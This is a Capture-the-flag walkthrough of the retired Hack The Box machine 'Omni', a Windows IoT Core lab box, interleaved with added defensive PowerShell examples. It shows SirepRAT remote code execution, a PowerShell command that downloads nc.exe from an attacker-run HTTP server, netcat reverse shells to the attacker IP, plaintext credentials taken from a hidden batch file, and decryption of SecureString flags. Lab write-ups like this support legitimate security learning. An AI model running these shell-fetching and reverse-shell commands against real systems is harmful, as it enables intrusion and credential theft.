Hack The Box Walkthrough Guide To: Omni


EDIT: Now unlocked for all as the machine has been retired.

Disclaimer: I do NOT want you to read this if you have not even tried to attempt any of it yourself first! This is intended as a guide once you have tried everything to work it out yourself and are really stuck. If you just follow along and never try to work it out, then you will struggle to learn. Spend some time doing decent enumeration. As they say in the OSCP, the most important thing is enumeration, enumeration, enumeration. With that out of the way, let's get on with some Hack The Box. I hope this is of some use.

Setup:
Kali Linux VM (connected to HackTheBox via OpenVPN)
CherryTree (for Notes)

I have a template I use in CherryTree that reminds me of some of the things I should be doing or checking for. As with all the machines, this often needs additional sections added to get further into the machine. It's just a generic starting template. I use it to dump notes or information that I might want to come back to later.


Rule Number 1: ALWAYS RESET THE MACHINE BEFORE YOU START! or go VIP!

Enumeration

Start with nmap

nmap -v -sC -sV -T5 -p- 10.10.10.204 -Pn

Highlight anything that initially might be of interest

[Image: nmap results. Windows Device Portal tells me that this is a Windows IoT Core device]

There is a port 8080 available, so let's fire up Burp and have a look at that.

[Image: Login page on port 8080]

After trying the typical admin/admin and admin/p@ssw0rd (the default for IoT Core) and having no luck, I look around for other things of interest in the nmap scan.

After looking at the results, we can see that this appears to be a Windows IoT Core device. Knowing that, we go and do some digging to find anything that might be of use to us. This we find in the form of SafeBreach's SirepRAT.

Exploit

[Image: GitHub repo: SafeBreach SirepRAT, RCE as SYSTEM on Windows IoT Core]

Git clone that repo and run the following command to test whether it works:

python SirepRAT.py 10.10.10.204 GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v
[Image: RCE is possible, as we can now read the Windows hosts file]

Now we want to start uploading files onto the host so we can get a slightly more stable interactive shell. We do this by uploading something like nc.exe.

[Image: Left: SirepRAT script | Right: Python3 http.server]

Now we have uploaded the file, we want to try and execute nc.exe and catch the remote shell.

[Image: x86 nc version not suitable]

Turns out that the x86 version won't work and we need to upload the x64 version, so same thing again, but this time upload the x64 version, nc64.exe, which you can download from https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip

To download the file from my machine I use Python's simple HTTP server module, which was burned into my brain when practising for my OSCP years ago.

This has changed a little with Python 3, so you want to use:

python3 -m http.server <PORT>
python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "powershell" --args "Invoke-WebRequest 'http://10.10.16.171:8181/nc.exe' -OutFile 'nc.exe'"
[Image: We have our remote shell. Top Left: SirepRAT exploit | Top Right: Python3 http.server | Bottom: Metasploit console]

We can now interact with this shell via nc.exe or msfconsole, dealer's choice 😉

Privilege Escalation

With this new shell, we need to start doing some enumeration to escalate privileges.

[Security.Principal.WindowsIdentity]::GetCurrent()

The command above gives us some information about the user that we are running as. As SafeBreach promised, we have a SYSTEM shell.

[Image: Current identity running as SYSTEM]
Get-CimInstance Win32_Group | Where-Object { [Security.Principal.WindowsIdentity]::GetCurrent().Groups.Value -contains $_.SID }

This command shows us that we are in the Administrators group as well.

[Image: Admin group]
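As an added example (not part of the original walkthrough), the two checks above can be folded into one PowerShell function that reports who the shell is running as and whether the token is LocalSystem or sits in the local Administrators group. It uses the same .NET WindowsIdentity API the walkthrough calls; the function name and output layout are my own.

```powershell
# Added example, not from the original walkthrough. Summarises the security
# context of the current shell using the WindowsIdentity API used above.
function Get-ShellIdentitySummary {
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)

    # Translate each group SID in the token to an account name where Windows
    # can resolve it; unresolvable SIDs (e.g. logon-session SIDs) stay raw.
    $groups = foreach ($sid in $identity.Groups) {
        try   { $sid.Translate([Security.Principal.NTAccount]).Value }
        catch { $sid.Value }
    }

    [pscustomobject]@{
        Name            = $identity.Name
        UserSid         = $identity.User.Value
        IsLocalSystem   = $identity.IsSystem      # true only for S-1-5-18
        # IsInRole checks the *enabled* groups in the token, so this is false
        # for an admin running a non-elevated (UAC-filtered) shell.
        IsAdministrator = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
        Groups          = $groups
    }
}

Get-ShellIdentitySummary | Format-List
```

Running this in each of the shells obtained during the walkthrough (SYSTEM, app, administrator) gives a quick side-by-side of what each account can do, which is the same information the screenshots capture but in a form you can paste into your notes.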

Now we want to look around for interesting files and folders.

[Image: Directory listing of C:\]

The Users folder is always a good place to start, and remembering we have SYSTEM permissions, there should be no issues accessing the files. As it turns out there was nothing in there, but that Data folder looks interesting, so let's see what is in there.

[Image: Directory listing of users]

Now this Users folder has more interesting files and folders for sure: a handy list of usernames, which might come in handy later.

[Image: List of user folders]

So we look at the admin folder and see the root.txt flag. Well, that was easy! Job done, grab a beer... is what I thought, but it turns out it was not the flag but a PowerShell SecureString encrypted password.

[Image: Encrypted PowerShell password]

Same goes for the user "app".

[Image: Encrypted PowerShell password]

At this point, off I go to read up about decrypting PowerShell SecureString passwords. Thanks to Stack Overflow, I get the hint I needed.

[Image: Stack Overflow command to decrypt the credentials]

However, when running this from the SYSTEM shell, I seem to have crashed the remote shell. So I had to re-read the Stack Overflow answer again: it says "with the same user account that encrypted them on the same machine". There was my problem.

Now back to looking around for potential usernames and passwords. Many of my Windows priv esc scripts were not working on this machine, so I started manually looking around.

The current shell was plain cmd, so I wanted to move to PowerShell rather than keep typing it in front of every command. Simply type:

powershell

After a while visiting directories and typing

ls -force

which also lists hidden files in folders, we eventually find "r.bat".

[Image: Hidden batch file]

Using the command "type" we can print the file to the screen:

type r.bat
[Image: Two usernames and passwords located in a hidden batch file]

We now have two usernames and passwords that we can use: app and administrator.
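The r.bat find is the textbook case of credentials left in a hidden script on disk. As an added, defender-side example that is not part of the original walkthrough, here is a PowerShell sweep that looks for exactly that class of artefact: hidden (or hidden-directory) script, batch and text files whose content matches common hard-coded-credential patterns. The function name, the default file types and the regex list are my own choices, and the report deliberately records only where a match was found, not the matched text.

```powershell
# Added example, not from the original walkthrough. Audits a drive for hidden
# script/batch/text files that embed credentials, like the r.bat above.
function Find-HiddenCredentialFiles {
    param(
        [string]   $Path    = 'C:\',
        [string[]] $Include = @('*.bat', '*.cmd', '*.ps1', '*.vbs', '*.txt', '*.xml', '*.ini'),
        # Select-String is case-insensitive by default, so no (?i) is needed.
        [string[]] $Pattern = @(
            'net\s+use\b.*\s/user:\S+\s+\S+',             # net use ... /user:name password
            '\bpassword\s*[=:]\s*\S+',                    # password=..., password: ...
            '-Password\s+\S+',                            # ... -Password literal
            'ConvertTo-SecureString\s+\S+.*-AsPlainText'  # plaintext turned into a SecureString
        )
    )

    Get-ChildItem -Path $Path -Recurse -Force -File -Include $Include -ErrorAction SilentlyContinue |
        Where-Object {
            # Keep files that are hidden themselves or that live in a hidden directory.
            ($_.Attributes -band [IO.FileAttributes]::Hidden) -or
            ($_.Directory.Attributes -band [IO.FileAttributes]::Hidden)
        } |
        ForEach-Object {
            $file = $_
            Select-String -Path $file.FullName -Pattern $Pattern -ErrorAction SilentlyContinue |
                ForEach-Object {
                    [pscustomobject]@{
                        File      = $file.FullName
                        Line      = $_.LineNumber
                        Pattern   = $_.Pattern
                        LastWrite = $file.LastWriteTime
                        # The matched text is intentionally not included, so the
                        # report can be shared without copying the secret into it.
                    }
                }
        }
}

# Usage: sweep the system drive and keep the findings in the session.
$findings = Find-HiddenCredentialFiles -Path 'C:\'
$findings | Sort-Object File, Line | Format-Table -AutoSize
```

Run as an administrator so that -Force can see into every directory; on a box like this one it flags r.bat within seconds, and on a real fleet the same sweep is a cheap periodic check that a build or provisioning script has not left a password behind.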

Now we have to think back to the initial nmap scan and the port 8080 that we were not able to log in to. Let's try some of the credentials on that login page.

Every edition of Windows 10 provides a web interface that you can use to manage and configure your device remotely called Windows Device Portal. It’s enabled by default in Windows 10 IoT Core and runs upon device startup. You can access it by connecting to http://:8080. The files for the Windows Device Portal can be found in C:\Windows\WebManagement\www on the device. Here’s a summary of the tabs currently available.

[Image: Windows Device Portal summary (two screenshots)]

Log in with the username "app" that we found and its password.

[Image: Successful login with the username app]

Now we are logged in as a different user, we should have different permissions. Having noticed the "Run Command" section, this can get us another remote shell as that user, "app".

[Image: Run Command section of the portal]

So let's catch a new remote shell.

[Image: Using the nc64 from earlier to spawn a new remote shell as the user app]
[Image: nc showing a new remote shell on port 6666]

Now, with the new shell, we can see different permissions.

[Image: Permissions of the app user]

Now we want to decrypt the credentials from earlier using the Stack Overflow post.

PS C:\windows\system32> $credential = Import-CliXml -Path U:\Users\app\user.txt
PS C:\windows\system32> $credential.GetNetworkCredential().Password

[Image: Decrypted password]

Nice! We have a user flag, go and store it somewhere or add it into the flags section on the hack the box website.

Now try to decrypt the root flag! Oh... yeah, remember earlier: "with the same user account that encrypted them on the same machine". So we should now log in with the other account that we found, "administrator".
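The reason the SYSTEM shell failed on user.txt, and why root.txt needs the administrator account, is that Export-CliXml does not store the password at all: it stores a DPAPI blob created in the CurrentUser scope, which only that user's DPAPI master key on that machine can unwrap. As an added example that is not part of the original walkthrough, the function below reproduces the round trip with a constructed throwaway credential and shows what actually lands in the file. The path, the username and the sample password are made up for the demo.

```powershell
# Added example, not from the original walkthrough. Demonstrates that the
# SecureString inside an Export-CliXml file is a per-user DPAPI blob, which is
# why user.txt/root.txt only decrypt as the account that created them.
function Test-CliXmlCredentialScope {
    param([string] $Path = (Join-Path $env:TEMP 'demo-cred.xml'))

    $secret = 'Example-P@ss-Only'        # constructed sample, not a real credential
    $ss     = ConvertTo-SecureString $secret -AsPlainText -Force
    $cred   = New-Object System.Management.Automation.PSCredential ('app', $ss)
    $cred | Export-CliXml -Path $Path

    # What lands on disk: a hex-encoded DPAPI blob, not the password. Every
    # DPAPI (CryptProtectData) blob starts with version 01000000 followed by
    # the provider GUID, so the hex begins 01000000d08c9ddf0115d111...
    $blob = (Select-String -Path $Path -Pattern '<SS N="Password">([0-9A-Fa-f]+)</SS>').Matches[0].Groups[1].Value

    # Same user, same machine: DPAPI unwraps the blob and the password comes back.
    # Imported under any other account, the unwrap fails and no password is recovered.
    $back      = Import-CliXml -Path $Path
    $roundTrip = $back.GetNetworkCredential().Password -eq $secret

    Remove-Item $Path -ErrorAction SilentlyContinue
    [pscustomobject]@{
        ProtectedFor     = [Security.Principal.WindowsIdentity]::GetCurrent().Name
        BlobHexLength    = $blob.Length
        BlobStartsWith   = $blob.Substring(0, 16)   # "01000000d08c9ddf" for a DPAPI blob
        RoundTripAsOwner = $roundTrip
    }
}

Test-CliXmlCredentialScope | Format-List
```

Run it once in the app shell and once in the administrator shell and ProtectedFor changes while RoundTripAsOwner stays true, because each run creates and reads its own file as the same user. Copying that file to another account, or reading it from SYSTEM as the walkthrough first tried, is exactly the case DPAPI refuses. This is also the caveat to remember when you find such files during an assessment or an incident: the blob on its own is not a password, and the only way to turn it back into one is a session as the user who wrote it.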

[Image: Portal login as "administrator"]

Again we want to get another remote shell, but this time as the "administrator" user.

[Image: Remote shell command for the user "administrator"]

We can use the following command, this time on a different port, with a new nc listener waiting to catch the connection:

c:\windows\system32\nc64.exe 10.10.16.171 7777 -e powershell
[Image: nc listener]

We get confirmation of the shell.

[Image: Remote shell captured]

Check the user that we are logged in as:

Get-CimInstance Win32_Group | Where-Object { [Security.Principal.WindowsIdentity]::GetCurrent().Groups.Value -contains $_.SID }

[Image: Checking permissions]

And finally we decrypt the root flag.

[Image: Decrypt the root flag]

If you want, you can even have a play around with the portal dashboard and take a screenshot.

[Image: IoT Core screenshot]
[Image: Omni has been Pwned in Hack The Box Labs]

__________________________________________________________________________________________________

I hope this helped you out. Share my article or links, or consider supporting this site by becoming a Patreon supporter or by using my affiliate links.

Recommended Reading

Hands-On Penetration Testing on Windows: Unleash Kali Linux, PowerShell, and Windows debugging tools for security testing and analysis

Raspberry Pi and Visual Basic: Programming Windows 10 IoT

Mastering Windows Security and Hardening: Secure and protect your Windows environment from intruders, malware attacks, and other cyber threats